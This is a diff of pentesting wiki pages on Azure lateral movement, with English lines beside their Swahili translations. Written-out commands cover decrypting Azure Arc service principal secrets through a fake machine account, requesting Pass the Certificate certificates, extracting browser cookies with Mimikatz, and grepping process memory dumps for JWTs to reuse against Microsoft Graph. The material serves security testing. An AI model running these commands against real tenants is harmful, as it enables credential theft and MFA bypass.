Microsoft Graph PowerShell ni SDK ya jukwaa nyingi inayowezesha ufikiaji wa APIs zote za Microsoft Graph, ikiwa ni pamoja na huduma kama SharePoint, Exchange, na Outlook, kwa kutumia kiunganishi kimoja. Inasaidia PowerShell 7+, uthibitishaji wa kisasa kupitia MSAL, vitambulisho vya nje, na maswali ya hali ya juu. Kwa kuzingatia ufikiaji wa chini kabisa, inahakikisha shughuli salama na inapokea masasisho ya mara kwa mara ili kuendana na vipengele vya hivi karibuni vya Microsoft Graph API.
Follow this link for the [**installation instructions**](https://learn.microsoft.com/en-us/powershell/microsoftgraph/installation).
Fuata kiungo hiki kwa [**maelekezo ya usakinishaji**](https://learn.microsoft.com/en-us/powershell/microsoftgraph/installation).
Commands in Microsoft Graph PowerShell are structured like: `<Action>-Mg<Service> <parameters>`
Amri katika Microsoft Graph PowerShell zimejengwa kama: `<Action>-Mg<Service> <parameters>`
#### Debug Microsoft Graph PowerShell
Using the parameter **`-Debug`** it's possible to see all the requests the tool is sending:
Kwa kutumia parameter **`-Debug`** inawezekana kuona maombi yote ambayo zana inatuma:
```bash
Get-MgUser -Debug
```
### ~~**AzureAD Powershell**~~
The Azure Active Directory (AD) module, now **deprecated**, is part of Azure PowerShell for managing Azure AD resources. It provides cmdlets for tasks like managing users, groups, and application registrations in Entra ID.
Moduli ya Azure Active Directory (AD), sasa **imeondolewa**, ni sehemu ya Azure PowerShell kwa ajili ya kusimamia rasilimali za Azure AD. Inatoa cmdlets kwa kazi kama kusimamia watumiaji, vikundi, na usajili wa programu katika Entra ID.
> [!TIP]
> This is replaced by Microsoft Graph PowerShell
Follow this link for the [**installation instructions**](https://www.powershellgallery.com/packages/AzureAD).
> Hii imebadilishwa na Microsoft Graph PowerShell
Fuata kiungo hiki kwa [**maelekezo ya usakinishaji**](https://www.powershellgallery.com/packages/AzureAD).

44
src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md
View File

@@ -2,19 +2,18 @@
{{#include ../../../banners/hacktricks-training.md}}
### Identifying the Issues
### Kutambua Masuala
Azure Arc allows for the integration of new internal servers (joined domain servers) into Azure Arc using the Group Policy Object method. To facilitate this, Microsoft provides a deployment toolkit necessary for initiating the onboarding procedure. Inside the ArcEnableServerGroupPolicy.zip file, the following scripts can be found: DeployGPO.ps1, EnableAzureArc.ps1, and AzureArcDeployment.psm1.
Azure Arc inaruhusu kuunganishwa kwa seva mpya za ndani (seva zilizounganishwa kwenye kikoa) ndani ya Azure Arc kwa kutumia mbinu ya Group Policy Object. Ili kuwezesha hili, Microsoft inatoa zana ya kutekeleza inayohitajika kwa ajili ya kuanzisha mchakato wa kuingiza. Ndani ya faili ya ArcEnableServerGroupPolicy.zip, skripti zifuatazo zinaweza kupatikana: DeployGPO.ps1, EnableAzureArc.ps1, na AzureArcDeployment.psm1.
When executed, the DeployGPO.ps1 script performs the following actions:
Wakati inatekelezwa, skripti ya DeployGPO.ps1 inafanya hatua zifuatazo:
1. Creates the Azure Arc Servers Onboarding GPO within the local domain.
2. Copies the EnableAzureArc.ps1 onboarding script to the designated network share created for the onboarding process, which also contains the Windows installer package.
1. Inaunda Azure Arc Servers Onboarding GPO ndani ya kikoa cha ndani.
2. Inakopya skripti ya kuingiza ya EnableAzureArc.ps1 kwenye sehemu ya mtandao iliyotengwa kwa ajili ya mchakato wa kuingiza, ambayo pia ina pakiti ya kusakinisha ya Windows.
When running this script, sys admins need to provide two main parameters: **ServicePrincipalId** and **ServicePrincipalClientSecret**. Additionally, it requires other parameters such as the domain, the FQDN of the server hosting the share, and the share name. Further details such as the tenant ID, resource group, and other necessary information must also be provided to the script.
An encrypted secret is generated in the AzureArcDeploy directory on the specified share using DPAPI-NG encryption. The encrypted secret is stored in a file named encryptedServicePrincipalSecret. Evidence of this can be found in the DeployGPO.ps1 script, where the encryption is performed by calling ProtectBase64 with $descriptor and $ServicePrincipalSecret as inputs. The descriptor consists of the Domain Computer and Domain Controller group SIDs, ensuring that the ServicePrincipalSecret can only be decrypted by the Domain Controllers and Domain Computers security groups, as noted in the script comments.
Wakati wa kuendesha skripti hii, wasimamizi wa mfumo wanahitaji kutoa vigezo viwili vikuu: **ServicePrincipalId** na **ServicePrincipalClientSecret**. Aidha, inahitaji vigezo vingine kama vile kikoa, FQDN ya seva inayohifadhi sehemu hiyo, na jina la sehemu hiyo. Maelezo zaidi kama vile kitambulisho cha mpangaji, kundi la rasilimali, na taarifa nyingine muhimu lazima pia zipewe skripti.
Siri iliyosimbwa inaundwa katika saraka ya AzureArcDeploy kwenye sehemu iliyotajwa kwa kutumia usimbaji wa DPAPI-NG. Siri iliyosimbwa inahifadhiwa katika faili inayoitwa encryptedServicePrincipalSecret. Ushahidi wa hili unaweza kupatikana katika skripti ya DeployGPO.ps1, ambapo usimbaji unafanywa kwa kuita ProtectBase64 na $descriptor na $ServicePrincipalSecret kama ingizo. Maelezo ya descriptor yanajumuisha SID za Kundi la Kompyuta za Kikoa na Kundi la Wakala wa Kikoa, kuhakikisha kwamba ServicePrincipalSecret inaweza kusimbwa tu na Vikundi vya Usalama vya Wakala wa Kikoa na Kompyuta za Kikoa, kama ilivyotajwa katika maoni ya skripti.
```powershell
# Encrypting the ServicePrincipalSecret to be decrypted only by the Domain Controllers and the Domain Computers security groups
$DomainComputersSID = "SID=" + $DomainComputersSID
@@ -23,24 +22,20 @@ $descriptor = @($DomainComputersSID, $DomainControllersSID) -join " OR "
Import-Module $PSScriptRoot\AzureArcDeployment.psm1
$encryptedSecret = [DpapiNgUtil]::ProtectBase64($descriptor, $ServicePrincipalSecret)
```
### Exploit
We have the follow conditions:
Tuna masharti yafuatayo:
1. We have successfully penetrated the internal network.
2. We have the capability to create or assume control of a computer account within Active Directory.
3. We have discovered a network share containing the AzureArcDeploy directory.
There are several methods to obtain a machine account within an AD environment. One of the most common is exploiting the machine account quota. Another method involves compromising a machine account through vulnerable ACLs or various other misconfigurations.
1. Tumefanikiwa kuingia kwenye mtandao wa ndani.
2. Tuna uwezo wa kuunda au kudhibiti akaunti ya kompyuta ndani ya Active Directory.
3. Tumegundua sehemu ya mtandao inayoshikilia saraka ya AzureArcDeploy.
Kuna njia kadhaa za kupata akaunti ya mashine ndani ya mazingira ya AD. Moja ya njia maarufu ni kutumia quota ya akaunti ya mashine. Njia nyingine inahusisha kuathiri akaunti ya mashine kupitia ACLs dhaifu au mipangilio mingine mbalimbali isiyo sahihi.
```powershell
Import-MKodule powermad
New-MachineAccount -MachineAccount fake01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
```
Once a machine account is obtained, it is possible to authenticate using this account. We can either use the runas.exe command with the netonly flag or use pass-the-ticket with Rubeus.exe.
Mara tu akaunti ya mashine imepatikana, inawezekana kuthibitisha kwa kutumia akaunti hii. Tunaweza ama kutumia amri ya runas.exe na bendera ya netonly au kutumia pass-the-ticket na Rubeus.exe.
```powershell
runas /user:fake01$ /netonly powershell
```
@@ -48,9 +43,7 @@ runas /user:fake01$ /netonly powershell
```powershell
.\Rubeus.exe asktgt /user:fake01$ /password:123456 /prr
```
By having the TGT for our computer account stored in memory, we can use the following script to decrypt the service principal secret.
Kwa kuwa na TGT ya akaunti yetu ya kompyuta iliyohifadhiwa kwenye kumbukumbu, tunaweza kutumia skripti ifuatayo kufungua siri ya huduma ya msingi.
```powershell
Import-Module .\AzureArcDeployment.psm1
@@ -59,17 +52,12 @@ $encryptedSecret = Get-Content "[shared folder path]\AzureArcDeploy\encryptedSer
$ebs = [DpapiNgUtil]::UnprotectBase64($encryptedSecret)
$ebs
```
Alternately, we can use [SecretManagement.DpapiNG](https://github.com/jborean93/SecretManagement.DpapiNG).
Alternatively, we can use [SecretManagement.DpapiNG](https://github.com/jborean93/SecretManagement.DpapiNG).
At this point, we can gather the remaining information needed to connect to Azure from the ArcInfo.json file, which is stored on the same network share as the encryptedServicePrincipalSecret file. This file contains details such as: TenantId, servicePrincipalClientId, ResourceGroup, and more. With this information, we can use Azure CLI to authenticate as the compromised service principal.
Katika hatua hii, tunaweza kukusanya taarifa zilizobaki zinazohitajika kuungana na Azure kutoka kwa faili la ArcInfo.json, ambalo limehifadhiwa kwenye sehemu ile ile ya mtandao kama faili la encryptedServicePrincipalSecret. Faili hii ina maelezo kama: TenantId, servicePrincipalClientId, ResourceGroup, na mengineyo. Pamoja na taarifa hizi, tunaweza kutumia Azure CLI kuthibitisha kama huduma ya msingi iliyovunjika.
## References
- [https://xybytes.com/azure/Abusing-Azure-Arc/](https://xybytes.com/azure/Abusing-Azure-Arc/)
{{#include ../../../banners/hacktricks-training.md}}

42
src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md
View File

@@ -2,42 +2,38 @@
{{#include ../../../banners/hacktricks-training.md}}
## Local Token Storage and Security Considerations
## Hifadhi ya Token za Mitaa na Mambo ya Usalama
### Azure CLI (Command-Line Interface)
### Azure CLI (Interface ya Amri)
Tokens and sensitive data are stored locally by Azure CLI, raising security concerns:
Token na data nyeti huhifadhiwa kwa ndani na Azure CLI, na kuleta wasiwasi wa usalama:
1. **Access Tokens**: Stored in plaintext within `accessTokens.json` located at `C:\Users\<username>\.Azure`.
2. **Subscription Information**: `azureProfile.json`, in the same directory, holds subscription details.
3. **Log Files**: The `ErrorRecords` folder within `.azure` might contain logs with exposed credentials, such as:
- Executed commands with credentials embedded.
- URLs accessed using tokens, potentially revealing sensitive information.
1. **Access Tokens**: Huhifadhiwa katika maandiko wazi ndani ya `accessTokens.json` iliyoko `C:\Users\<username>\.Azure`.
2. **Taarifa za Usajili**: `azureProfile.json`, katika saraka hiyo hiyo, ina maelezo ya usajili.
3. **Faili za Kumbukumbu**: Folda ya `ErrorRecords` ndani ya `.azure` inaweza kuwa na kumbukumbu zenye akreditivu zilizofichuliwa, kama vile:
- Amri zilizotekelezwa zikiwa na akreditivu zilizojumuishwa.
- URLs zilizofikiwa kwa kutumia token, ambazo zinaweza kufichua taarifa nyeti.
### Azure PowerShell
Azure PowerShell also stores tokens and sensitive data, which can be accessed locally:
Azure PowerShell pia huhifadhi token na data nyeti, ambazo zinaweza kufikiwa kwa ndani:
1. **Access Tokens**: `TokenCache.dat`, located at `C:\Users\<username>\.Azure`, stores access tokens in plaintext.
2. **Service Principal Secrets**: These are stored unencrypted in `AzureRmContext.json`.
3. **Token Saving Feature**: Users have the ability to persist tokens using the `Save-AzContext` command, which should be used cautiously to prevent unauthorized access.
1. **Access Tokens**: `TokenCache.dat`, iliyoko `C:\Users\<username>\.Azure`, huhifadhi token za ufikiaji katika maandiko wazi.
2. **Siri za Huduma Kuu**: Hizi huhifadhiwa bila usimbaji katika `AzureRmContext.json`.
3. **Kipengele cha Kuhifadhi Token**: Watumiaji wana uwezo wa kudumisha token kwa kutumia amri ya `Save-AzContext`, ambayo inapaswa kutumika kwa tahadhari ili kuzuia ufikiaji usioidhinishwa.
## Automatic Tools to find them
## Zana za Otomatiki za Kuziokoa
- [**Winpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe)
- [**Get-AzurePasswords.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/AzureRM/Get-AzurePasswords.ps1)
## Security Recommendations
## Mapendekezo ya Usalama
Considering the storage of sensitive data in plaintext, it's crucial to secure these files and directories by:
Kuzingatia uhifadhi wa data nyeti katika maandiko wazi, ni muhimu kulinda faili na saraka hizi kwa:
- Limiting access rights to these files.
- Regularly monitoring and auditing these directories for unauthorized access or unexpected changes.
- Employing encryption for sensitive files where possible.
- Educating users about the risks and best practices for handling such sensitive information.
- Kuweka mipaka ya haki za ufikiaji kwa faili hizi.
- Kufuata na kukagua mara kwa mara saraka hizi kwa ufikiaji usioidhinishwa au mabadiliko yasiyotarajiwa.
- Kutumia usimbaji kwa faili nyeti inapowezekana.
- Kuwaelimisha watumiaji kuhusu hatari na mbinu bora za kushughulikia taarifa nyeti kama hizi.
{{#include ../../../banners/hacktricks-training.md}}

34
src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md
View File

@@ -4,40 +4,32 @@
## Pass the Certificate (Azure)
In Azure joined machines, it's possible to authenticate from one machine to another using certificates that **must be issued by Azure AD CA** for the required user (as the subject) when both machines support the **NegoEx** authentication mechanism.
Katika mashine zilizounganishwa na Azure, inawezekana kuthibitisha kutoka mashine moja hadi nyingine kwa kutumia vyeti ambavyo **vinapaswa kutolewa na Azure AD CA** kwa mtumiaji anayehitajika (kama somo) wakati mashine zote zinasaidia **NegoEx** utaratibu wa uthibitishaji.
In super simplified terms:
Kwa maneno rahisi sana:
- The machine (client) initiating the connection **needs a certificate from Azure AD for a user**.
- Client creates a JSON Web Token (JWT) header containing PRT and other details, sign it using the Derived key (using the session key and the security context) and **sends it to Azure AD**
- Azure AD verifies the JWT signature using client session key and security context, checks validity of PRT and **responds** with the **certificate**.
- Mashine (mteja) inayozindua muunganisho **inahitaji cheti kutoka Azure AD kwa mtumiaji**.
- Mteja anaunda kichwa cha JSON Web Token (JWT) kinachojumuisha PRT na maelezo mengine, kinatia saini kwa kutumia Funguo iliyotokana (kwa kutumia funguo ya kikao na muktadha wa usalama) na **kinituma kwa Azure AD**
- Azure AD inathibitisha saini ya JWT kwa kutumia funguo ya kikao cha mteja na muktadha wa usalama, inakagua uhalali wa PRT na **inajibu** kwa **cheti**.
In this scenario and after grabbing all the info needed for a [**Pass the PRT**](pass-the-prt.md) attack:
Katika hali hii na baada ya kupata taarifa zote zinazohitajika kwa [**Pass the PRT**](pass-the-prt.md) shambulio:
- Username
- Tenant ID
- Jina la mtumiaji
- Kitambulisho cha mpangilio
- PRT
- Security context
- Derived Key
It's possible to **request P2P certificate** for the user with the tool [**PrtToCert**](https://github.com/morRubin/PrtToCert)**:**
- Muktadha wa usalama
- Funguo iliyotokana
Inawezekana **kuomba cheti cha P2P** kwa mtumiaji kwa kutumia chombo [**PrtToCert**](https://github.com/morRubin/PrtToCert)**:**
```bash
RequestCert.py [-h] --tenantId TENANTID --prt PRT --userName USERNAME --hexCtx HEXCTX --hexDerivedKey HEXDERIVEDKEY [--passPhrase PASSPHRASE]
```
The certificates will last the same as the PRT. To use the certificate you can use the python tool [**AzureADJoinedMachinePTC**](https://github.com/morRubin/AzureADJoinedMachinePTC) that will **authenticate** to the remote machine, run **PSEXEC** and **open a CMD** on the victim machine. This will allow us to use Mimikatz again to get the PRT of another user.
Vithibitisho vitadumu sawa na PRT. Kutumia vithibitisho unaweza kutumia chombo cha python [**AzureADJoinedMachinePTC**](https://github.com/morRubin/AzureADJoinedMachinePTC) ambacho kitafanya **uthibitishaji** kwenye mashine ya mbali, kukimbia **PSEXEC** na **kufungua CMD** kwenye mashine ya mwathirika. Hii itaturuhusu kutumia Mimikatz tena kupata PRT ya mtumiaji mwingine.
```bash
Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP
```
## References
- For more details about how Pass the Certificate works check the original post [https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597)
- Kwa maelezo zaidi kuhusu jinsi Pass the Certificate inavyofanya kazi angalia chapisho asilia [https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597)
{{#include ../../../banners/hacktricks-training.md}}

24
src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md
View File

@@ -2,40 +2,34 @@
{{#include ../../../banners/hacktricks-training.md}}
## Why Cookies?
## Kwa Nini Cookies?
Browser **cookies** are a great mechanism to **bypass authentication and MFA**. Because the user has already authenticated in the application, the session **cookie** can just be used to **access data** as that user, without needing to re-authenticate.
Browser **cookies** ni mekanizma nzuri ya **kupita uthibitishaji na MFA**. Kwa sababu mtumiaji tayari amejiandikisha katika programu, **cookie** ya kikao inaweza kutumika tu **kupata data** kama mtumiaji huyo, bila kuhitaji kujiandikisha tena.
You can see where are **browser cookies located** in:
Unaweza kuona ambapo **cookies za kivinjari ziko** katika:
{{#ref}}
https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts?q=browse#google-chrome
{{#endref}}
## Attack
## Shambulio
The challenging part is that those **cookies are encrypted** for the **user** via the Microsoft Data Protection API (**DPAPI**). This is encrypted using cryptographic [keys tied to the user](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) the cookies belong to. You can find more information about this in:
Sehemu ngumu ni kwamba **cookies hizo zimefungwa** kwa **mtumiaji** kupitia Microsoft Data Protection API (**DPAPI**). Hii imefungwa kwa kutumia [funguo za kificho zinazohusishwa na mtumiaji](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) ambao cookies zinahusiana nazo. Unaweza kupata maelezo zaidi kuhusu hii katika:
{{#ref}}
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords
{{#endref}}
With Mimikatz in hand, I am able to **extract a users cookies** even though they are encrypted with this command:
Kwa Mimikatz mkononi, naweza **kutoa cookies za mtumiaji** hata ingawa zimefungwa kwa amri hii:
```bash
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit
```
Kwa Azure, tunajali kuhusu kuki za uthibitishaji ikiwemo **`ESTSAUTH`**, **`ESTSAUTHPERSISTENT`**, na **`ESTSAUTHLIGHT`**. Hizi zipo kwa sababu mtumiaji amekuwa hai kwenye Azure hivi karibuni.
For Azure, we care about the authentication cookies including **`ESTSAUTH`**, **`ESTSAUTHPERSISTENT`**, and **`ESTSAUTHLIGHT`**. Those are there because the user has been active on Azure lately.
Tu naviga kwenye login.microsoftonline.com na ongeza kuki **`ESTSAUTHPERSISTENT`** (iliyoundwa na chaguo la “Stay Signed In”) au **`ESTSAUTH`**. Na utathibitishwa.
Just navigate to login.microsoftonline.com and add the cookie **`ESTSAUTHPERSISTENT`** (generated by “Stay Signed In” option) or **`ESTSAUTH`**. And you will be authenticated.
## References
## Marejeleo
- [https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/](https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/)
{{#include ../../../banners/hacktricks-training.md}}

6
src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
View File

@@ -2,10 +2,6 @@
{{#include ../../../banners/hacktricks-training.md}}
**Check:** [**https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/**](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/)
**Angalia:** [**https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/**](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/)
{{#include ../../../banners/hacktricks-training.md}}

6
src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
View File

@@ -2,10 +2,6 @@
{{#include ../../../banners/hacktricks-training.md}}
**Chec the post in** [**https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) although another post explaining the same can be found in [**https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30**](https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30)
**Angalia chapisho katika** [**https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) ingawa chapisho lingine linalofafanua sawa linaweza kupatikana katika [**https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30**](https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30)
{{#include ../../../banners/hacktricks-training.md}}

18
src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md
View File

@@ -4,14 +4,13 @@
## **Basic Information**
As explained in [**this video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), some Microsoft software synchronized with the cloud (Excel, Teams...) might **store access tokens in clear-text in memory**. So just **dumping** the **memory** of the process and **grepping for JWT tokens** might grant you access over several resources of the victim in the cloud bypassing MFA.
Kama ilivyoelezwa katika [**hii video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), baadhi ya programu za Microsoft zinazohusishwa na wingu (Excel, Teams...) zinaweza **kuhifadhi alama za ufikiaji katika maandiko wazi kwenye kumbukumbu**. Hivyo basi, **kudondosha** **kumbukumbu** ya mchakato na **kuangalia kwa alama za JWT** kunaweza kukupa ufikiaji wa rasilimali kadhaa za mwathirika katika wingu bila kupita MFA.
Steps:
1. Dump the excel processes synchronized with in EntraID user with your favourite tool.
2. Run: `string excel.dmp | grep 'eyJ0'` and find several tokens in the output
3. Find the tokens that interest you the most and run tools over them:
Hatua:
1. Dondosha mchakato wa excel uliohusishwa na mtumiaji wa EntraID kwa kutumia chombo chako unachokipenda.
2. Endesha: `string excel.dmp | grep 'eyJ0'` na pata alama kadhaa katika matokeo
3. Pata alama ambazo zinakuvutia zaidi na endesha zana juu yao:
```bash
# Check the identity of the token
curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/me | jq
@@ -31,11 +30,6 @@ curl -s -H "Authorization: Bearer <token>" 'https://graph.microsoft.com/v1.0/sit
┌──(magichk㉿black-pearl)-[~]
└─$ curl -o <filename_output> -L -H "Authorization: Bearer <token>" '<@microsoft.graph.downloadUrl>'
```
**Note that these kind of access tokens can be also found inside other processes.**
**Kumbuka kwamba aina hizi za access tokens zinaweza pia kupatikana ndani ya michakato mingine.**
{{#include ../../../banners/hacktricks-training.md}}

6
src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md
View File

@@ -2,10 +2,6 @@
{{#include ../../banners/hacktricks-training.md}}
To start the tests you should have access with a user with **Reader permissions over the subscription** and **Global Reader role in AzureAD**. If even in that case you are **not able to access the content of the Storage accounts** you can fix it with the **role Storage Account Contributor**.
Ili kuanza majaribio unapaswa kuwa na ufikiaji na mtumiaji mwenye **idhini za Msomaji juu ya usajili** na **nafasi ya Msomaji wa Kimataifa katika AzureAD**. Ikiwa hata katika hali hiyo huwezi **kufikia maudhui ya Akaunti za Hifadhi** unaweza kurekebisha hilo kwa **nafasi ya Mchangiaji wa Akaunti ya Hifadhi**.
{{#include ../../banners/hacktricks-training.md}}